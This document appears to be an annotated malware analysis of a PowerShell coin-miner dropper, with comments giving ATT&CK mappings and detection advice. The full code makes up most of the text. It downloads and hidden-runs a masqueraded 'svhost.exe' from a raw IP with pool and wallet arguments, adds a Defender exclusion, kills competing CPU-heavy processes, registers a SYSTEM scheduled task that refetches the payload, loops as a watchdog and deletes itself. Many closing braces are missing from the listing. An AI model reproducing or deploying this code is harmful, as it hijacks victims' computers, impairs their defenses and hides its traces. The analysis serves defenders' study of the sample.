# Analyst note: hard-coded configuration read by the functions further down.
# The literal values are the sample's indicators as captured on this page:
#   - payload fetched over plain HTTP from a raw IP on a non-standard port,
#   - file name one letter away from the legitimate svchost.exe
#     (masquerading, ATT&CK T1036.005),
#   - staging location under the current user's %TEMP%.
# Define the URL of the program to download and the desired arguments
$programUrl = "http://151.106.34.115:6573/svhost.exe" # Replace with the actual URL
$programName = "svhost.exe" # Replace with the actual program name
# NOTE(review): the argument string has the shape "pool host:port" plus a
# wallet/worker identifier, which would fit a coin miner (resource hijacking,
# ATT&CK T1496) - confirm against the binary itself.
$desiredArguments = "-d spr.tw-pool.com:14001 -w spectre:qz84qx270dh2u73e3p9m528lr3xhykspmatyc4pcsjlf50756d8m6vht6z5nl.WNDALL" # Replace with the desired arguments
$downloadPath = "$env:TEMP\$programName"
# Check if the script is running with administrative privileges
function Test-Administrator {
# Returns $true when the current Windows identity is a member of the built-in
# Administrators role, $false otherwise. Takes no parameters and has no side
# effects; it only inspects the token of the running process.
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
return $principal.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
# The result is only reported to the console here; in the lines visible on this
# page nothing else branches on $isAdmin, so the privileged steps that follow
# are attempted regardless and rely on their own try/catch to fail quietly.
$isAdmin = Test-Administrator
if ($isAdmin) {
Write-Host "Running with administrative privileges."
} else {
Write-Host "Running without administrative privileges. Some functions may be skipped."
# Function to add an exclusion in Windows Defender
function Add-WindowsDefenderExclusion {
# Adds $path to Microsoft Defender's path-exclusion list via Add-MpPreference
# and returns $true on success, $false if the cmdlet throws.
#
# Analyst note: this is a defense-impairment step (ATT&CK T1562.001). Once the
# exclusion exists, Defender stops scanning that path.
# Detection: Defender configuration changes are logged as event 5007 in
#   Microsoft-Windows-Windows Defender/Operational, and Add-MpPreference calls
#   show up in PowerShell script block logging (event 4104).
# Mitigation: manage exclusions centrally and prevent local additions from
#   being merged (the DisableLocalAdminMerge policy); alert on any exclusion
#   that points into a user-writable directory such as %TEMP%.
param (
[string]$path # Path to the file or folder to exclude
try {
# Add the path as an exclusion in Windows Defender
# -ErrorAction Stop turns a failure (e.g. a non-elevated session) into an
# exception so the catch block below can report it.
Add-MpPreference -ExclusionPath $path -ErrorAction Stop
Write-Host "Added '$path' as an exclusion in Windows Defender." -ForegroundColor Green
return $true
} catch {
Write-Host "Failed to add exclusion. Error: $_" -ForegroundColor Red
return $false
# Example usage
# Analyst note: the excluded path is the same %TEMP%\svhost.exe location that
# $downloadPath resolves to, and the exclusion is requested before the download
# step is defined or called - i.e. scanning is switched off for the payload's
# landing path ahead of the file arriving.
$exclusionPath = "$env:TEMP\svhost.exe" # Replace with the path to your file
Write-Host "Adding exclusion for '$exclusionPath'..."
if (Add-WindowsDefenderExclusion -path $exclusionPath) {
Write-Host "Exclusion added successfully." -ForegroundColor Green
} else {
Write-Host "Failed to add exclusion." -ForegroundColor Red
# Function to terminate processes using excessive CPU (requires admin privileges)
function Terminate-HighCPUProcess {
# Samples the '\Process(*)\% Processor Time' performance counter, selects every
# instance whose value exceeds $cpuThreshold and whose name is not in the
# ignore list below, and attempts a forced Stop-Process on each one.
# Returns nothing; outcomes are only written to the console.
#
# Analyst note: the code is written to stop other CPU-heavy workloads on the
# host. NOTE(review): presumably this frees CPU for the downloaded program or
# removes competing miners - that intent is inferred, not shown here.
# Detection: Get-Counter on the Process object followed by Stop-Process -Force
#   in script block logs (event 4104); unexplained termination of user or
#   agent processes shortly after a PowerShell session starts.
param (
[int]$cpuThreshold = 80 # Default threshold can be adjusted
# List of system processes to ignore
$systemProcesses = @("svchost", "System", "Registry", "smss", "csrss", "wininit", "services", "lsass", "lsm", "winlogon", "spoolsv", "explorer")
Write-Host "Checking for processes using excessive CPU..."
try {
# Get CPU usage for each process using Get-Counter
$cpuUsage = Get-Counter '\Process(*)\% Processor Time' | Select-Object -ExpandProperty CounterSamples
# Keep samples above the threshold, dropping the ignore list and the two
# aggregate/idle pseudo-instances.
$highCPUProcesses = $cpuUsage | Where-Object {
$_.CookedValue -gt $cpuThreshold -and
-not ($systemProcesses -contains $_.InstanceName) -and
$_.InstanceName -ne "_Total" -and
$_.InstanceName -ne "Idle"
}
if (-not $highCPUProcesses) {
Write-Host "No processes found exceeding the CPU usage threshold of $cpuThreshold%." -ForegroundColor Green
return
}
foreach ($proc in $highCPUProcesses) {
try {
$process = Get-Process -Id $proc.InstanceName -ErrorAction SilentlyContinue
if ($process) {
Write-Host "Attempting to terminate process: $($proc.InstanceName) (PID: $($process.Id)) - CPU Usage: $($proc.CookedValue)%" -ForegroundColor Yellow
Stop-Process -Id $process.Id -Force -ErrorAction Stop
Write-Host "Successfully terminated process: $($proc.InstanceName)" -ForegroundColor Green
}
}
catch {
Write-Host "Failed to terminate process $($proc.InstanceName) (PID: $($process.Id)). Error: $_" -ForegroundColor Red
}
}
catch {
Write-Host "An error occurred while monitoring CPU usage: $_" -ForegroundColor Red
# Function to download and execute the program (does not require admin privileges)
function Download-And-Execute {
# Fetches $programUrl to $downloadPath and launches the file with
# $desiredArguments in a hidden window. Takes no parameters; it reads
# $programUrl, $downloadPath, $programName and $desiredArguments from the
# enclosing scope. Returns $true if the started process is still alive two
# seconds after launch, $false on any download or launch failure (calling
# Cleanup-Files on launch failure).
#
# Analyst note: ingress tool transfer followed by execution (ATT&CK T1105).
# The file is retrieved over plain HTTP and run with no hash or signature
# check, so the host executes whatever the remote endpoint serves.
# Detection: powershell.exe making an outbound HTTP request to a raw IP on a
#   high port; an .exe written under %TEMP% by powershell.exe; a child process
#   started from %TEMP% with a hidden window (Sysmon events 3, 11 and 1, or
#   the EDR equivalents); Invoke-WebRequest / WebClient.DownloadFile followed
#   by Start-Process in script block logs (event 4104).
# Mitigation: application control that blocks execution from user-writable
#   paths; egress filtering for direct-to-IP HTTP.
Write-Host "Downloading program from $programUrl..."
# Attempt to use Invoke-WebRequest for PowerShell 3.0 and above
try {
Invoke-WebRequest -Uri $programUrl -OutFile $downloadPath -ErrorAction Stop
} catch {
Write-Host "Failed to download using Invoke-WebRequest. Falling back to .NET WebClient."
# Fallback: Use .NET WebClient for PowerShell 2.0
try {
$webClient = New-Object System.Net.WebClient
$webClient.DownloadFile($programUrl, $downloadPath)
} catch {
Write-Host "Failed to download using .NET WebClient. Skipping program download."
return $false
}
# Verify the file was downloaded
if (-not (Test-Path $downloadPath)) {
Write-Host "Downloaded file not found. Skipping execution."
return $false
Write-Host "Executing program: $programName"
try {
# Run the program directly (no window prompts)
# -PassThru returns the process object so liveness can be checked below.
$process = Start-Process -FilePath $downloadPath -ArgumentList $desiredArguments -WindowStyle Hidden -PassThru -ErrorAction Stop
# Wait for the process to start and check if it's running
Start-Sleep -Seconds 2 # Give the process time to start
if (-not $process.HasExited) {
Write-Host "Program '$programName' executed successfully." -ForegroundColor Green
return $true
} else {
Write-Host "Program '$programName' failed to execute or exited immediately." -ForegroundColor Red
Cleanup-Files
return $false
}
} catch {
Write-Host "Failed to execute program '$programName'. Error: $_" -ForegroundColor Red
Cleanup-Files
return $false
# Function to verify if the program is running
function Verify-Program {
# Reports whether any process named after $programName (extension stripped)
# is currently running. Prints PID, start time and working-set size for each
# match. Returns $true when at least one instance exists, $false otherwise,
# including when Get-Process throws.
#
# Analyst note: this is the liveness half of the script's watchdog. Matching is
# by process name only, so any process called "svhost" satisfies it.
param (
[Parameter(Mandatory = $true)]
[string]$programName
Write-Host "Verifying if program '$programName' is running..."
try {
# Strip any file extension from program name for proper process checking
$processName = [System.IO.Path]::GetFileNameWithoutExtension($programName)
# Get all processes matching the name (case-insensitive)
$runningProcesses = Get-Process -Name $processName -ErrorAction Stop
if ($runningProcesses) {
$processCount = ($runningProcesses | Measure-Object).Count
Write-Host "Program '$programName' is running. Found $processCount instance(s):" -ForegroundColor Green
# Display details for each running instance
foreach ($process in $runningProcesses) {
Write-Host " - PID: $($process.Id), Start Time: $($process.StartTime), Memory: $([math]::Round($process.WorkingSet64 / 1MB, 2)) MB" -ForegroundColor Green
}
return $true
}
Write-Host "Program '$programName' is not currently running." -ForegroundColor Yellow
return $false
# Get-Process -ErrorAction Stop raises this exception type when no process
# has the requested name; it is treated as "not running".
catch [Microsoft.PowerShell.Commands.ProcessCommandException] {
Write-Host "No processes found matching '$programName'." -ForegroundColor Yellow
return $false
catch {
Write-Host "Error occurred while checking for program: $_" -ForegroundColor Red
return $false
# Function to terminate the program (if running)
function Terminate-Program {
# Force-stops every process whose name equals $programName without its
# extension, then re-queries to confirm none remain. Returns $true only when
# all instances were stopped; returns $false if none were found, if any
# Stop-Process call fails (the loop stops at the first failure), or if
# instances are still present afterwards.
#
# Analyst note: Main calls this before re-downloading, so a burst of
# Stop-Process on "svhost" followed by a fresh download and launch is the
# script's refresh cycle rather than a remediation action.
param (
[Parameter(Mandatory = $true)]
[string]$programName
Write-Host "Attempting to terminate program '$programName'..."
try {
# Strip any file extension from program name for proper process checking
$processName = [System.IO.Path]::GetFileNameWithoutExtension($programName)
# Get all processes matching the name
$runningProcesses = Get-Process -Name $processName -ErrorAction Stop
if (-not $runningProcesses) {
Write-Host "No processes found matching '$programName'." -ForegroundColor Yellow
return $false
}
$processCount = ($runningProcesses | Measure-Object).Count
Write-Host "Found $processCount running instance(s) of '$programName'." -ForegroundColor Yellow
foreach ($process in $runningProcesses) {
try {
Write-Host "Terminating process (PID: $($process.Id))..." -ForegroundColor Yellow
Stop-Process -Id $process.Id -Force -ErrorAction Stop
Write-Host "Successfully terminated process (PID: $($process.Id))" -ForegroundColor Green
}
catch {
Write-Host "Failed to terminate process (PID: $($process.Id)). Error: $_" -ForegroundColor Red
return $false
}
}
# Verify all processes are terminated
$remainingProcesses = Get-Process -Name $processName -ErrorAction SilentlyContinue
if ($remainingProcesses) {
Write-Host "Warning: Some processes could not be terminated." -ForegroundColor Red
return $false
}
return $true
catch [Microsoft.PowerShell.Commands.ProcessCommandException] {
Write-Host "Error: No processes found matching '$programName'." -ForegroundColor Yellow
return $false
catch {
Write-Host "Error occurred while terminating program: $_" -ForegroundColor Red
return $false
# Function to create a scheduled task for periodic checking (requires admin privileges)
# Analyst note: this block repeats the configuration at the top of the listing
# with the same URL, file name and pool endpoint; only the identifier after
# "-w spectre:" differs. NOTE(review): that suggests two variants of the script
# were concatenated on this page - treat both identifiers as indicators.
# Define the URL of the program to download and the desired arguments
$programUrl = "http://151.106.34.115:6573/svhost.exe" # Replace with the actual URL
$programName = "svhost.exe" # Replace with the actual program name
$desiredArguments = "-d spr.tw-pool.com:14001 -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL" # Replace with the desired arguments
$downloadPath = "$env:TEMP\$programName"
# Check if the script is running with administrative privileges
function Test-Administrator {
# Second definition of the same helper: returns $true when the current Windows
# identity is in the built-in Administrators role. Create-ScheduledTask calls
# it as its privilege gate.
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
return $principal.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
# Function to create a scheduled task
function Create-ScheduledTask {
# Registers (replacing any existing task of the same name) a daily 09:00
# scheduled task that runs powershell.exe with an inline command which
# re-downloads $programUrl to $downloadPath and starts it hidden with
# $desiredArguments (read from the enclosing scope, not a parameter).
# Returns $true on successful registration, $false when the caller is not an
# administrator or when any cmdlet throws.
#
# Analyst note: persistence via scheduled task (ATT&CK T1053.005). The task is
# registered for the SYSTEM account at the highest run level, so every daily
# run fetches and executes the remote file with full local privileges, and the
# inline command swallows its own errors.
# Detection: Security event 4698 (scheduled task created, needs object-access
#   auditing) and Microsoft-Windows-TaskScheduler/Operational event 106; tasks
#   whose action is powershell.exe with "-ExecutionPolicy Bypass -Command" and
#   an embedded download; the default task name used below.
# Response: removing the running process is not enough - the task re-creates
#   it on the next trigger, so unregister the task and block the URL as well.
param (
[string]$taskName = "DownloadAndRunProgramTask",
[string]$programUrl,
[string]$downloadPath,
[string]$programName
# Check for admin rights
if (-not (Test-Administrator)) {
Write-Host "Error: Administrative privileges are required to create scheduled tasks." -ForegroundColor Red
return $false
try {
# Remove existing task if it exists
if (Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue) {
Write-Host "Removing existing scheduled task '$taskName'..."
Unregister-ScheduledTask -TaskName $taskName -Confirm:$false -ErrorAction Stop
Write-Host "Existing task removed successfully." -ForegroundColor Green
}
# Define the PowerShell command to run in the task
$psCommand = @"
`$programUrl = '$programUrl'
`$downloadPath = '$downloadPath'
`$programName = '$programName'
# Download the program
try {
Invoke-WebRequest -Uri `$programUrl -OutFile `$downloadPath -ErrorAction Stop
if (Test-Path `$downloadPath) {
# Execute the program
Start-Process -FilePath `$downloadPath -ArgumentList '$desiredArguments' -WindowStyle Hidden -ErrorAction Stop
}
} catch {
# Silently handle errors
}
# Create the scheduled task action
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -Command `"$psCommand`""
# Create the scheduled task trigger (runs daily)
$trigger = New-ScheduledTaskTrigger -Daily -At 9am
# Register the scheduled task
Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -User "SYSTEM" -RunLevel Highest -ErrorAction Stop
Write-Host "Scheduled task '$taskName' created successfully." -ForegroundColor Green
return $true
} catch {
Write-Host "Error: Failed to create scheduled task. $_" -ForegroundColor Red
return $false
# Function to verify if the scheduled task exists
function Verify-ScheduledTask {
# Returns $true when Get-ScheduledTask finds a task named $taskName, $false
# when the lookup throws. Only existence is tested: the task's State is never
# inspected, so the "enabled"/"disabled" wording in the messages is not
# something this code actually establishes.
param (
[string]$taskName = "DownloadAndRunProgramTask"
try {
$task = Get-ScheduledTask -TaskName $taskName -ErrorAction Stop
Write-Host "Scheduled task '$taskName' exists and is enabled." -ForegroundColor Green
return $true
} catch {
Write-Host "Scheduled task '$taskName' does not exist or is disabled." -ForegroundColor Red
return $false
# Main execution
# Analyst note: top-level driver for the persistence step. It registers the
# task with the script-level URL, path and file name, then checks that the
# task can be looked up. The console strings below ("Starting S-T execution.",
# "S-T execution completed.") are distinctive and can be searched for in
# PowerShell transcripts and script block logs.
Write-Host "Starting S-T execution."
# Create the scheduled task
if (Create-ScheduledTask -programUrl $programUrl -downloadPath $downloadPath -programName $programName) {
Write-Host "Scheduled task creation successful." -ForegroundColor Green
} else {
Write-Host "Scheduled task creation failed." -ForegroundColor Red
# Verify the scheduled task
if (Verify-ScheduledTask) {
Write-Host "Scheduled task verification successful." -ForegroundColor Green
} else {
Write-Host "Scheduled task verification failed." -ForegroundColor Red
Write-Host "S-T execution completed."
# Main loop
function Main {
# Endless watchdog loop. Each pass: (1) if more than two days have elapsed
# since the last refresh, stop the program and download/launch it again;
# (2) run Terminate-HighCPUProcess; (3) if the program is not running,
# download/launch it again; (4) sleep 39600 seconds (11 hours).
# Exits the script with code 1, after calling Cleanup-Files, whenever
# Download-And-Execute returns $false.
#
# Analyst note: together with the scheduled task this gives the sample two
# independent re-launch paths. A long-lived powershell.exe that wakes roughly
# every 11 hours and repeats the same download is the behavioural signature;
# the process must be stopped along with the payload during response.
$startTime = Get-Date # Record the start time
while ($true) {
# Check if 2 days have passed
if ((Get-Date) - $startTime -gt (New-TimeSpan -Days 2)) {
Write-Host "2 days have passed. Refreshing the operation..."
Terminate-Program -programName $programName # Terminate the current program
if (-not (Download-And-Execute)) {
Write-Host "Program failed to execute. Exiting script." -ForegroundColor Red
Cleanup-Files
exit 1
}
$startTime = Get-Date # Reset the start time
}
Terminate-HighCPUProcess
if (-not (Verify-Program -programName $programName)) {
Write-Host "Program is not running. Repeating the process..."
if (-not (Download-And-Execute)) {
Write-Host "Program failed to execute. Exiting script." -ForegroundColor Red
Cleanup-Files
exit 1
}
}
Write-Host "Sleeping before the next check..."
Start-Sleep -Seconds 39600 # Adjust the interval as needed
# Function to delete residual files after successful execution
function Cleanup-Files {
# Removes the file at $downloadPath (read from the enclosing scope) and then
# the path held in $MyInvocation.MyCommand.Path, which the code treats as the
# script's own location. Failures are reported to the console and otherwise
# ignored; nothing is returned.
#
# Analyst note: on-disk indicator removal (ATT&CK T1070.004). It is invoked on
# the failure paths of Download-And-Execute and Main, so an unsuccessful run is
# written to leave neither the payload nor the script behind.
# Forensics: do not rely on recovering the .ps1 from disk - preserve PowerShell
#   script block logs (event 4104), transcripts and EDR file-create telemetry,
#   which retain the content and the paths after deletion.
Write-Host "Cleaning up residual files..."
# Delete the downloaded program file
if (Test-Path $downloadPath) {
try {
Remove-Item -Path $downloadPath -Force -ErrorAction Stop
Write-Host "Deleted downloaded program file: $downloadPath" -ForegroundColor Green
} catch {
Write-Host "Failed to delete downloaded program file: $downloadPath. Error: $_" -ForegroundColor Red
}
# Delete the script file itself
$scriptPath = $MyInvocation.MyCommand.Path
if (Test-Path $scriptPath) {
try {
Remove-Item -Path $scriptPath -Force -ErrorAction Stop
Write-Host "Deleted script file: $scriptPath" -ForegroundColor Green
} catch {
Write-Host "Failed to delete script file: $scriptPath. Error: $_" -ForegroundColor Red
}
# Run the main loop